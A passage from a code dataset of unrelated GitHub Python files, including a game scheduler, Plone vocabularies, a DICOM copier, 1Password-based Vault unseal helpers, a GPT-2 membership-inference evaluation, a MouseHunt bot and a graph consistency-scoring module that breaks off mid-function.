\n\n\nclass ExtScheduler(object, metaclass=ManualConstructionSingleton):\n\t\"\"\"The ExtScheduler is used for time based events that are not part of the simulation (gui, menu, scrolling).\n\tTo start a timed callback, call add_new_object() to make the TimingThread Class create a CallbackObject for you.\n\t@param pump: pump list the scheduler registers itself with.\n\t\"\"\"\n\n\tNOOP = _ExtCallbackObject(lambda: 42 * 1337 - 3.14, None)\n\n\tdef __init__(self, pump):\n\t\tsuper().__init__()\n\t\tself.schedule = []\n\t\tself.pump = pump\n\t\tself.pump.append(self.tick)\n\n\tdef tick(self):\n\t\t\"\"\"Main loop: run every callback that is due and re-add the looping ones.\"\"\"\n\t\twhile self.schedule:\n\t\t\telem = self.schedule[0]  # heap, first elem is smallest\n\t\t\tif elem[0] <= time.time():\n\t\t\t\tpopped = heapq.heappop(self.schedule)\n\t\t\t\tassert popped is elem\n\t\t\t\tobj = elem[1]\n\t\t\t\tobj.callback()\n\t\t\t\tif obj.loops > 0 or obj.loops == -1:\n\t\t\t\t\tself.add_object(obj)  # re-add object\n\t\t\telse:\n\t\t\t\tbreak
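\n\n\t# Usage sketch (hypothetical pump list; actual construction may go through\n\t# the game's own singleton machinery):\n\t#   pump = []\n\t#   scheduler = ExtScheduler(pump)\n\t#   scheduler.add_new_object(lambda: print(\"tick\"), None, run_in=0.5, loops=3)\n\t#   for cb in pump: cb()  # call periodically from the main loop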
\n\n\tdef add_object(self, obj):\n\t\t\"\"\"Adds a new CallbackObject instance to the callbacks list\n\t\t@param obj: CallbackObject type object, containing all necessary information\n\t\t\"\"\"\n\t\tif obj.loops > 0:\n\t\t\tobj.loops -= 1\n\t\t# sort by first entry, which is execution time\n\t\theapq.heappush(self.schedule, [(time.time() + obj.run_in), obj])\n\n\tdef add_new_object(self, callback, class_instance, run_in=1, loops=1):\n\t\t\"\"\"Creates a new CallbackObject instance and calls the self.add_object() function.\n\t\t@param callback: function callback, which is called run_in time.\n\t\t@param class_instance: class instance the function belongs to.\n\t\t@param run_in: float number of seconds after which the callback is called. Standard is 1, run next second.\n\t\t@param loops: How often the callback is called. -1 = infinite times. Standard is 1, run once.\"\"\"\n\t\tobj = _ExtCallbackObject(callback, class_instance, run_in, loops)\n\t\tself.add_object(obj)\n\n\tdef rem_all_classinst_calls(self, class_instance):\n\t\t\"\"\"Removes all callbacks from the scheduler that belong to the class instance class_instance.\"\"\"\n\t\tfor tup in self.schedule:\n\t\t\tif tup[1].class_instance is class_instance:\n\t\t\t\t# don't destroy heap\n\t\t\t\ttup[1] = self.__class__.NOOP\n\n\tdef rem_call(self, instance, callback):\n\t\t\"\"\"Removes all callbacks of 'instance' that are 'callback'\n\t\t@param instance: the instance that would execute the call\n\t\t@param callback: the function to remove\n\t\t\"\"\"\n\t\tfor tup in self.schedule:\n\t\t\tif tup[1].class_instance is instance and tup[1].callback == callback:\n\t\t\t\t# don't destroy heap\n\t\t\t\ttup[1] = self.__class__.NOOP\n\n\tdef __del__(self):\n\t\tself.schedule = []\n\t\tself.pump.remove(self.tick)\n\t\tself.pump = None\n","repo_name":"unknown-horizons/unknown-horizons","sub_path":"horizons/extscheduler.py","file_name":"extscheduler.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"51"}
+{"seq_id":"17905919066","text":"# -*- coding: utf-8 -*-\n\"\"\"Vocabularies used by spirit.plone.theming.\"\"\"\n\nfrom plone import api as ploneapi\nfrom plone.api.exc import InvalidParameterError\nfrom plone.registry.interfaces import IRegistry\nfrom spirit.plone.theming import _\nfrom spirit.plone.theming.interfaces import IPloneThemingVocabularies\nfrom zope.component import getUtility\nfrom zope.globalrequest import getRequest\nfrom zope.interface import implementer\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleTerm\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\nclass BaseVocabulary(object):\n    \"\"\"A base vocabulary class.\"\"\"\n\n    def _get_registry_record(self, name=None):\n        try:\n            return ploneapi.portal.get_registry_record(\n                name=name,\n                interface=IPloneThemingVocabularies,\n            )\n        except InvalidParameterError:\n            return\n        except KeyError:\n            registry = getUtility(IRegistry)\n            registry.registerInterface(IPloneThemingVocabularies)\n            try:\n                return ploneapi.portal.get_registry_record(\n                    name=name,\n                    interface=IPloneThemingVocabularies,\n                )\n            except (KeyError, InvalidParameterError):\n                ploneapi.portal.show_message(\n                    message=_(\n                        u'Please upgrade or reinstall spirit.plone.theming',\n                    ),\n                    request=getRequest(),\n                )\n                return\n\n\n@implementer(IVocabularyFactory)\nclass AvailableHeaderOptionsVocabulary(BaseVocabulary):\n    \"\"\"Vocabulary for available header options.\"\"\"\n\n    def __call__(self, context):\n\n        options = self._get_registry_record(name='available_header_options')\n\n        items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n        return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailableFooterOptionsVocabulary(BaseVocabulary):\n    \"\"\"Vocabulary for available footer options.\"\"\"\n\n    def __call__(self, context):\n\n        options = self._get_registry_record(name='available_footer_options')\n\n        items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n        return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailableColorOptionsVocabulary(BaseVocabulary):\n    \"\"\"Vocabulary for available color options.\"\"\"\n\n    def __call__(self, context):\n\n        options = self._get_registry_record(name='available_color_options')\n\n        items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n        return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailablePatternOptionsVocabulary(BaseVocabulary):\n    \"\"\"Vocabulary for available pattern options.\"\"\"\n\n    def __call__(self, context):\n\n        options = self._get_registry_record(name='available_pattern_options')\n\n        items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n        return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailableLayoutOptionsVocabulary(BaseVocabulary):\n    \"\"\"Vocabulary for available layout options.\"\"\"\n\n    def __call__(self, context):\n\n        options = self._get_registry_record(name='available_layout_options')\n\n        items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n        return SimpleVocabulary(items)\n","repo_name":"it-spirit/spirit.plone.theming","sub_path":"src/spirit/plone/theming/vocabularies.py","file_name":"vocabularies.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"}
+{"seq_id":"37180008348","text":"\"\"\"\nThis script extracts DICOM series into a separate folder, selecting them by the tags we want.\nCreated by chenmingliang on 2020/11/17.\n\"\"\"\nimport pydicom\nimport os\nimport shutil\n\n# tags = ['Exposure', 'KVP', 'ConvolutionKernel', 'SliceThickness']\n# standard1 = [10, 120, 'CHEST_STND', 1]\n# standard2 = [10, 120, 'LIMB_STND', 1]\n# standard = [standard1, standard2]\ntags = ['ConvolutionKernel']\nstandard = [['LIMB_BONE']]\nori_path = 'E:\\卷叠伪影\\XFFS\\Jupiter\\\\test'\nTarget_path = './Data'\n\ndef loadFileInformation(filename):\n\n    information = {}\n    ds = pydicom.read_file(filename)\n    for tag in tags:\n        # getattr is safer than building and eval()-ing 'ds.<tag>'\n        information[tag] = getattr(ds, tag)\n    return information\n\n\ndef Is_file(information):\n    \"\"\"\n    Check whether a series matches any of the required tag standards.\n    :return: True if every requested tag matches one of the standards.\n    \"\"\"\n    for standard_tmp in standard:\n        is_file = True\n        for count in range(len(information)):\n            if information[tags[count]] == standard_tmp[count]:\n                continue\n            else:\n                is_file = False\n                break\n        if is_file:\n            break\n        else:\n            continue\n    return is_file
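\n\n# Example: with tags = ['ConvolutionKernel'] and standard = [['LIMB_BONE']]\n# as configured above, a series whose ConvolutionKernel is 'LIMB_BONE'\n# makes Is_file() return True.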
\n\n\ndef copy_file(inputPath, targetPath, count):\n    if os.path.exists(targetPath):\n        shutil.rmtree(targetPath)\n    shutil.copytree(inputPath, targetPath)\n    print('Finished dir %d' % count)\n\nif __name__ == '__main__':\n    count = 0\n    for root, dirs, files in os.walk(ori_path):\n        if not files == []:\n            if os.path.splitext(files[0])[-1] == '.dcm':\n                if len(files) > 30:\n                    tmp_file = os.path.join(root, files[0])\n                    info = loadFileInformation(tmp_file)\n                    is_file = Is_file(info)\n                    if is_file:\n                        count += 1\n                        target_path = os.path.join(Target_path, str(count))\n                        copy_file(root, target_path, count)\n","repo_name":"chris1992212/Dicom-tools","sub_path":"DataCopy_tag.py","file_name":"DataCopy_tag.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"14272662370","text":"import json\nimport subprocess\nimport sys\n\nfrom .run import run_cmd\n\n\ndef get_config_op_legacy(config):\n    op = config.get('ob_binary', 'op')\n    try:\n        op_legacy_check_existing_vault(config)\n    except subprocess.CalledProcessError:\n        print('You need to be logged in with:')\n        print(f'eval $({op} signin)')\n        sys.exit(1)\n    try:\n        uuid = op_legacy_get_item_id(config, config['op_title'])\n    except KeyError:\n        print('Unknown config in 1password: {}'.format(config['op_title']))\n        print('Config:')\n        print(config)\n        sys.exit(1)\n\n    # do not name this local variable \"json\": it would shadow the module\n    item = op_legacy_get_data(config, uuid)\n    fields = op_legacy_get_item(item)\n    data = op_legacy_extract_from_item(config, fields)\n    if 'root_token' not in data:\n        data['root_token'] = op_legacy_extract_from_password(item)\n    return data\n\n\ndef op_legacy_get_item_id(config, title):\n    item_list = op_legacy_get_vault_item_list(config)\n    return item_list[title]\n\n\ndef op_legacy_get_vault_item_list(config):\n    op = config.get('ob_binary', 'op')\n    item_list = {}\n    stream = run_cmd('{} list items --vault={}'.format(\n        op,\n        config['op_vault']))\n    data = json.loads(stream)\n\n    for item in data:\n        uuid = item['uuid']\n        title = item.get('overview', {}).get('title', None)\n        item_list[title] = uuid\n\n    return item_list\n\n\ndef op_legacy_check_existing_vault(config):\n    op = config.get('ob_binary', 'op')\n    vault_list = []\n\n    stream = run_cmd(f'{op} list vaults')\n    data = json.loads(stream)\n    for vault in data:\n        vault_list.append(vault['name'])\n    if config['op_vault'] not in vault_list:\n        print('Need to login with:')\n        print(f'eval $({op} signin)')\n        sys.exit(1)\n\n\ndef op_legacy_get_data(config, uuid):\n    op = config.get('ob_binary', 'op')\n    stream = run_cmd('{} get item {} --vault={}'.format(\n        op,\n        uuid,\n        config['op_vault'],\n    ))\n    data = json.loads(stream)\n    return data\n\n\ndef op_legacy_get_item(data):\n    sections = data.get('details', {}).get('sections', {})\n    return op_legacy_extract_fields(sections)\n\n\ndef op_legacy_extract_fields(sections):\n    fields_list = {}\n    for section in sections:\n        fields = section.get('fields', None)\n        if fields:\n            for field in fields:\n                fields_list[field['t']] = field['v']\n    return fields_list\n\n\ndef op_legacy_extract_from_item(config, fields):\n    data = {}\n\n    if 'op_fields_root_token' in config:\n        data['root_token'] = fields[config['op_fields_root_token']]\n    unseal_keys = []\n    for i in range(1, 10):\n        last_value = fields.get(config['op_fields_unseal_keys'].format(i), None)\n        if last_value:\n            unseal_keys.append(last_value)\n\n    data['unseal_keys'] = unseal_keys\n\n    return data\n\n\ndef op_legacy_extract_from_password(data):\n    fields = data.get('details', {}).get('fields', {})\n    for field in fields:\n        if field.get('name', '') == 'password':\n            return field.get('value')\n","repo_name":"nledez/vault_python_unseal","sub_path":"unseal_vault/op_legacy.py","file_name":"op_legacy.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"6723874155","text":"from transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport os\nimport argparse\nfrom tqdm import tqdm\nimport torch\nimport pandas as pd\nimport json\n\n\ndef get_all_texts(split):\n    df = pd.read_csv(f'twitter_split_{split}.csv', header=None)\n    texts = df[6].to_list()\n    print(texts[:10])\n\n    return texts[:20000]\n\ndef get_all_texts_clean(split):\n    df = pd.read_csv(f'twitter_split_{split}.csv', header=None)\n    texts = df[6].to_list()\n    print(texts[:10])\n\n    # remove the end-of-text token; str.strip() would eat individual\n    # characters from both ends, so use replace() instead\n    return [t.replace('<|endoftext|>', '') for t in texts][:20000]\n\n\nclass
TextDataset(torch.utils.data.Dataset):\n def __init__(self, texts):\n self.train_texts = texts\n\n def __len__(self):\n return len(self.train_texts)\n\n def __getitem__(self, index):\n return self.train_texts[index]\n\n\n\n\ndef eval_ppl(texts_eval, model_name):\n print(f\"evaluating {model_name}\")\n\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2')\n tokenizer.pad_token = tokenizer.eos_token\n model = GPT2LMHeadModel.from_pretrained(model_name)\n model = model.to('cuda:2')\n\n\n test_dataset = TextDataset(texts_eval)\n eval_dataloader = torch.utils.data.DataLoader(test_dataset, shuffle=True, batch_size=16)\n\n\n\n model.eval()\n epoch_loss = 0\n losses = []\n with torch.no_grad():\n for texts in tqdm(eval_dataloader):\n text_tokenized = tokenizer(texts, padding = True, truncation = True, max_length = 70, return_tensors='pt').input_ids.to('cuda:2')\n loss = model(text_tokenized, labels=text_tokenized).loss\n\n epoch_loss += loss.item()\n losses.append(loss.item())\n\n print(\"evaluation loss\", 16*epoch_loss/len(test_dataset))\n return losses\n\n\nif __name__ == '__main__':\n texts_eval = get_all_texts_clean(1)\n l1_ = eval_ppl(texts_eval, \"gpt2\")\n l2_ = eval_ppl(texts_eval, \"twitter_model_target_epoch_4\")\n\n non_member_differences = [l2-l1 for l1, l2 in zip(l1_, l2_)]\n\n texts_eval = get_all_texts_clean(0)\n l1_ = eval_ppl(texts_eval, \"gpt2\")\n l2_ = eval_ppl(texts_eval, \"twitter_model_target_epoch_4\")\n member_differences = [l2-l1 for l1, l2 in zip(l1_, l2_)]\n\n\n print(\"lengths\", len(member_differences))\n print(\"mean diff members\", sum(member_differences)/len(member_differences))\n print(\"mean diff non members\", sum(non_member_differences)/len(non_member_differences))\n\n prev_fpr = 0\n factor = 1\n for i in range(10000):\n median_index = i\n median = sorted(member_differences+non_member_differences)[median_index]\n\n\n tp = 0\n fn = 0\n for diff in member_differences:\n if diff <= median:\n tp += 1\n\n else:\n fn += 1\n\n tn = 0\n fp = 0\n for diff in non_member_differences:\n if diff > median:\n tn += 1\n else:\n fp += 1\n\n if prev_fpr < 0.1 and fp/(fp+tn) >= 0.1:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n break\n\n if prev_fpr < 0.01 and fp/(fp+tn) >= 0.01:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n\n if prev_fpr < 0.001 and fp/(fp+tn) >= 0.001:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n\n if prev_fpr < 0.0001 and fp/(fp+tn) >= 0.0001:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n\n\n prev_fpr = fp/(fp+tn)","repo_name":"justusmattern27/guided-extraction","sub_path":"evaluate_ppl.py","file_name":"evaluate_ppl.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28139319157","text":"\"\"\"\nfor pdf document list from $document dir\n\"\"\"\n# -*- coding: utf-8 -*-\n#coding=utf-8\n\nimport sys\nimport os\nimport json\nimport logging\n\nconfigEnvir = 'test'\nDocumentConfigFile = './'\nDocument_Dir = './documents/'\nDocument_Type = '.pdf'\n\nlogging.basicConfig(filename='alarm_logger.log', level=logging.INFO)\n\ndef getDocumentInfo(configType):\n global DocumentConfigFile\n global Document_Dir\n global Document_Type\n\n scriptsPath = os.path.abspath(os.path.dirname(__file__))\n \n DocumentConfigFile = scriptsPath + '/config/api_options.json'\n if (configType == 'test'):\n DocumentConfigFile = scriptsPath + '/config/api_options.json'\n elif (configType == 'rtm'):\n DocumentConfigFile = scriptsPath + 
'/config/rtm/api_options.json'\n\n    if os.path.exists(DocumentConfigFile):\n        try:\n            configFile = open(DocumentConfigFile)\n            configFileContent = configFile.read()\n            result = json.loads(configFileContent)\n            Document_Dir = result['document_dir']\n            Document_Type = result['document_type']
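\n            # Expected config shape (inferred from the module defaults above):\n            # {\"document_dir\": \"./documents/\", \"document_type\": \".pdf\"}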
\n        except Exception as e:\n            logging.error('Config File %s Read Failed (detail: %s)' % (DocumentConfigFile, e))\n    else:\n        logging.info('Config File %s Can not be found' % (DocumentConfigFile))\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) > 1:\n        configEnvir = sys.argv[1]\n    else:\n        logging.error('Usage: %s %s [%s] [%s]' % (sys.argv[0], 'test/rtm', 'Document_Dir', 'Document_Type'))\n        sys.exit(1)\n\n    # get config dir name and file type\n    getDocumentInfo(configEnvir)\n\n    if len(sys.argv) > 2:\n        Document_Config_str = sys.argv[2]\n        try:\n            Document_Config = json.loads(Document_Config_str)\n            # json.loads returns a dict, so use key access, not attributes\n            Document_Dir = Document_Config.get('document_dir') or Document_Dir\n            Document_Type = Document_Config.get('document_type') or Document_Type\n        except Exception as e:\n            logging.error('Params filter error detail: %s' % e)\n\n    return_file_list = []\n\n    logging.info(Document_Dir)\n    logging.info(Document_Type)\n    try:\n        if os.path.isdir(Document_Dir):\n            logging.info('dir %s exists' % Document_Dir)\n            filelist = os.listdir(Document_Dir)\n            for file in filelist:\n                if len(file.split('.')) > 1:\n                    filetype = file.split('.')[1]\n                    if Document_Type.find(filetype) > 0:\n                        logging.info('file name: %s' % file)\n                        return_file_list.append(file)\n        else:\n            logging.error('dir %s not exists' % Document_Dir)\n    except Exception as e:\n        logging.error('Documents Dir filter Failed. (detail: %s)' % e)\n\n    print(json.dumps(return_file_list))\n    logging.info(json.dumps(return_file_list))\n","repo_name":"huykai/shmcc_website_nodejs","sub_path":"scripts/getDocumentList.py","file_name":"getDocumentList.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"73622838559","text":"#===================================================================\n# Data Splitting\n#===================================================================\ndef timeslicing(Exp, Exp3, start_date, end_date, last_date):\n    \"\"\"\n    Split the experiment datasets into training and test periods.\n\n    Inputs\n    ------\n    start_date : first epoch of the training window\n    end_date : last epoch of the training window\n    last_date : last epoch of the test window\n\n    Outputs\n    -------\n    Training and test slices for experiments 1, 2, 4a-d and experiment 3.\n    \"\"\"\n\n    #===================== Experiments 1, 2, 4a-d\n    X_training_exp = Exp.sel(time=slice(start_date, end_date))\n    X_test_exp = Exp.sel(time=slice(end_date + 1, last_date))\n\n    #===================== Experiment 3\n    Y_training_exp3 = Exp3.sel(time=slice(start_date, end_date))\n    Y_test_exp3 = Exp3.sel(time=slice(end_date + 1, last_date))\n\n    return X_training_exp, X_test_exp, Y_training_exp3, Y_test_exp3
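\n    # Example call (hypothetical integer time coordinates, since end_date + 1\n    # must itself be a valid coordinate): timeslicing(Exp, Exp3, 1980, 2000, 2010)\n    # trains on 1980-2000 and tests on 2001-2010.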
\n","repo_name":"kachingasilwimba/Comprehensive-exam","sub_path":"Computing_Artifact/.ipynb_checkpoints/data_spliting-checkpoint.py","file_name":"data_spliting-checkpoint.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"74581293597","text":"# Standard Library\nimport os\nimport logging\n\n# Third Party Library\nfrom selenium.common.exceptions import NoSuchElementException\n\n# My Library\nfrom MyBot.bot import Bot\nfrom MyBot.settings import env\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.DEBUG)\n# logging.basicConfig(format='%(levelname)s:%(funcName)s:%(message)s', level = logging.DEBUG)\n\nformatter = logging.Formatter(\n    fmt=\"%(asctime)s: %(levelname)-8s: %(name)s %(funcName)s(): %(message)s\",\n    datefmt=\"%H:%M:%S\",\n)\n\nfile_handler = logging.FileHandler(\"bot.log\")\nfile_handler.setLevel(logging.WARNING)\nfile_handler.setFormatter(formatter)\n\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\n\nlogger.addHandler(file_handler)\nlogger.addHandler(stream_handler)\n\nDYNAMIC_FUNCTION = \"burroughs_rift_instructions\"\n\n\ndef prepare(bot: Bot) -> None:\n    instruction = env(DYNAMIC_FUNCTION)\n\n    try:\n        globals()[instruction](bot)\n        # needs to pop because read_env does not override the env variables\n        os.environ.pop(DYNAMIC_FUNCTION)\n    except KeyError:\n        logger.debug(f\"The function {instruction} does not exist.\")\n\n\n# helpers for Burroughs Rift\ndef isMisting(bot: Bot) -> bool:\n    bot.driver.implicitly_wait(1)\n    try:\n        bot.driver.find_element_by_class_name(\"is_misting\")\n        bot.driver.implicitly_wait(5)\n        return True\n    except NoSuchElementException:\n        bot.driver.implicitly_wait(5)\n        return False\n\n\ndef mistIsGTE19(bot: Bot) -> bool:\n    return (\n        int(\n            bot.driver.find_elements_by_class_name(\"mistQuantity\")[0]\n            .get_attribute(\"innerText\")\n            .split(\"/\")[0]\n        )\n        >= 19\n    )\n\n\ndef mistIsGTE16(bot: Bot) -> bool:\n    return (\n        int(\n            bot.driver.find_elements_by_class_name(\"mistQuantity\")[0]\n            .get_attribute(\"innerText\")\n            .split(\"/\")[0]\n        )\n        >= 16\n    )\n\n\ndef toggleMist(bot: Bot) -> None:\n    bot.driver.find_elements_by_class_name(\"mistButton\")[0].click()\n\n\ndef onMist(bot: Bot) -> None:\n    if isMisting(bot):\n        pass\n    else:\n        toggleMist(bot)\n\n\ndef offMist(bot: Bot) -> None:\n    if isMisting(bot):\n        toggleMist(bot)\n    else:\n        pass\n\n\ndef maintainMistInRed(bot: Bot) -> None:\n    logger.debug(\"maintaining mist in red\")\n    if mistIsGTE19(bot):\n        offMist(bot)\n    else:\n        onMist(bot)\n\n\ndef maintainMistInGreen(bot: Bot) -> None:\n    logger.debug(\"maintaining mist in green\")\n    if mistIsGTE16(bot):\n        offMist(bot)\n    else:\n        onMist(bot)\n","repo_name":"ANGkeith/Web-Bot","sub_path":"src/MyBot/environments/burroughs_rift.py","file_name":"burroughs_rift.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"21042329943","text":"yen = 1000\nN = int(input())\nrest = yen - N\n\nyen_list = [500, 100, 50, 10, 5, 1]\nresult = 0\n\n# greedy change-making: e.g. N = 380 leaves rest = 620, which breaks into\n# 500 + 100 + 10 + 10, i.e. 4 coins\nfor coin in yen_list:\n    if rest // coin > 0:\n        result += rest // coin\n        rest %= coin\n\nprint(result)\n","repo_name":"qkrwlsgh1011/python_practice","sub_path":"23_04_06.py","file_name":"23_04_06.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"42179906050","text":"from pathlib import Path\nimport requests\n\ndata_folder = './raw_daily_data'\n\nPath(data_folder).mkdir(parents=True, exist_ok=True)\n\ngame_url = 'https://www.blaseball.com/database/games?day={day}&season={season}'\n\nstart_season = 0\nend_season = 10\n\nfor season in range(start_season, end_season+1):\n\tseason_folder = data_folder + '/season_{season}'\n\tPath(season_folder.format(season=season)).mkdir(parents=True, exist_ok=True)\n\n\tday = 0\n\twhile True:\n\t\tday_file = season_folder + '/day_{day:02}.json'\n\t\tif Path(day_file.format(season=season, day=day)).is_file():\n\t\t\tprint('Already have day {day} of season {season}'.format(day=day+1, season=season+1))\n\t\t\tday += 1\n\t\t\tcontinue\n\n\t\tresp = requests.get(game_url.format(day=day, season=season))\n\t\tif resp.text == '[]':\n\t\t\tbreak\n\t\t# reuse the day_file template instead of repeating the path literal\n\t\twith open(day_file.format(season=season, day=day), 'w') as f:\n\t\t\tf.write(resp.text)\n\t\tprint('Finished day {} of season {}'.format(day+1, season+1))\n\t\tday += 1\n","repo_name":"Thingo314/blaseball-elo","sub_path":"main/pull_data.py","file_name":"pull_data.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"70479425758","text":"setup, moves = open(\"input.txt\").read().split(\"\\n\\n\")\n\nsetup = setup.split(\"\\n\")\n\nnumstacks = len(setup[-1].split())\nstack1 = [[] for _ in range(numstacks)]\nstack2 = [[] for _ in range(numstacks)]\n\nfor line in reversed(setup[:-1]):\n    for i, j in enumerate(range(1, 1 + numstacks * 4, 4)):\n        if line[j].isalpha():\n            stack1[i].append(line[j])\n            stack2[i].append(line[j])\n\nfor line in moves.split(\"\\n\"):\n    _, num, _, source, _, dest = line.split()\n    num, source, dest = map(int, [num, source, dest])\n    # part 1 moves crates one at a time, reversing their order\n    for j in range(num):\n        stack1[dest - 1].append(stack1[source - 1].pop())\n\n    # part 2 moves the whole slice intact, keeping the order\n    stack2[dest - 1].extend(stack2[source - 1][-num:])\n    del stack2[source - 1][-num:]\n\nprint(\"\".join([stack[-1] for stack in stack1]))  # GFTNRBZPF\nprint(\"\".join([stack[-1] for stack in stack2]))  # VRQWPDSGP\n","repo_name":"einarsi/adventofcode","sub_path":"day05_supply_stacks/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"658771513","text":"from abc import ABC, abstractmethod\nfrom typing import Dict, List, Tuple\n\nimport networkx as nx\nimport numpy as np\nimport torch\nfrom torch import
nn\n\nfrom pytorch_gleam.data.datasets.kbi_misinfo_stance import flip_tm_stance\n\n\nclass ConsistencyScoring(nn.Module, ABC):\n def __init__(self):\n super().__init__()\n\n @abstractmethod\n def forward(\n self,\n adj_list: List[Tuple[str, str, Tuple[float, float]]],\n node_labels: Dict[str, int],\n ) -> Tuple[np.array, Dict[str, int]]:\n pass\n\n\nclass MultiHopConsistencyScoring(ConsistencyScoring):\n def __init__(self, num_steps: int = 1, num_classes: int = 3):\n super().__init__()\n self.num_steps = num_steps\n self.num_classes = num_classes\n\n def initialize(self, adj_list, seed_node_labels):\n g = nx.Graph()\n # list of (ex_t_id, ex_p_id, ex_tmp_energy)\n # 0 - entail\n # 1 - contradict\n nodes = set()\n unlabeled_nodes = []\n labeled_nodes = []\n node_idx = {}\n for t_id, p_id, tp_r_dists in adj_list:\n if t_id not in nodes:\n node_idx[t_id] = len(node_idx)\n if t_id in seed_node_labels:\n labeled_nodes.append(t_id)\n else:\n unlabeled_nodes.append(t_id)\n if p_id not in nodes:\n node_idx[p_id] = len(node_idx)\n if p_id in seed_node_labels:\n labeled_nodes.append(p_id)\n else:\n unlabeled_nodes.append(p_id)\n\n nodes.add(t_id)\n nodes.add(p_id)\n entail_weight, contradict_weight = tp_r_dists\n entail_weight = -entail_weight.item()\n contradict_weight = -contradict_weight.item()\n g.add_edge(\n t_id,\n p_id,\n entail_weight=entail_weight,\n contradict_weight=contradict_weight,\n )\n return g, unlabeled_nodes, labeled_nodes, node_idx\n\n def propagate_seeds(\n self,\n labeled_nodes,\n unlabeled_nodes,\n graph,\n nls,\n nlc,\n seed_node_labels,\n node_idx,\n ):\n for node in unlabeled_nodes:\n for other_node in labeled_nodes:\n other_label = seed_node_labels[other_node]\n if isinstance(other_label, torch.Tensor):\n other_label = other_label.item()\n # entailment, contradiction, or neither does not mean anything if we know\n # the label of the other node\n if other_label == 0:\n continue\n edge = graph.get_edge_data(node, other_node)\n entail_score = edge[\"entail_weight\"]\n entail_label = other_label\n contradict_score = edge[\"contradict_weight\"]\n contradict_label = flip_tm_stance(other_label)\n n_idx = node_idx[node]\n nls[n_idx, entail_label, 0] += entail_score\n nlc[n_idx, entail_label, 0] += 1\n nls[n_idx, contradict_label, 0] += contradict_score\n nlc[n_idx, contradict_label, 0] += 1\n nls[:, :, 0] = nls[:, :, 0] / nlc[:, :, 0]\n\n def propagate(self, nodes, graph, nls, nlc, step, node_idx):\n for node in nodes:\n for other_node in nodes:\n if node == other_node:\n continue\n edge = graph.get_edge_data(node, other_node)\n entail_score = edge[\"entail_weight\"]\n contradict_score = edge[\"contradict_weight\"]\n n_idx = node_idx[node]\n o_idx = node_idx[other_node]\n for other_pred in [1, 2]:\n entail_label = other_pred\n contradict_label = flip_tm_stance(other_pred)\n node_score = nls[o_idx, other_pred, step - 1]\n # node_count = nlc[o_idx, other_pred, step-1]\n nls[n_idx, entail_label, step] += node_score + entail_score\n nlc[n_idx, entail_label, step] += 1\n nls[n_idx, contradict_label, step] += node_score + contradict_score\n nlc[n_idx, contradict_label, step] += 1\n nls[:, :, step] = nls[:, :, step] / nlc[:, :, step]\n\n def forward(\n self,\n adj_list: List[Tuple[str, str, Tuple[float, float]]],\n node_labels: Dict[str, int],\n ) -> Tuple[np.array, Dict[str, int]]:\n assert len(node_labels) > 0\n\n graph, unlabeled_nodes, labeled_nodes, node_idx = self.initialize(adj_list, node_labels)\n num_steps = self.num_steps\n # no need to do any propagation steps if there are no 
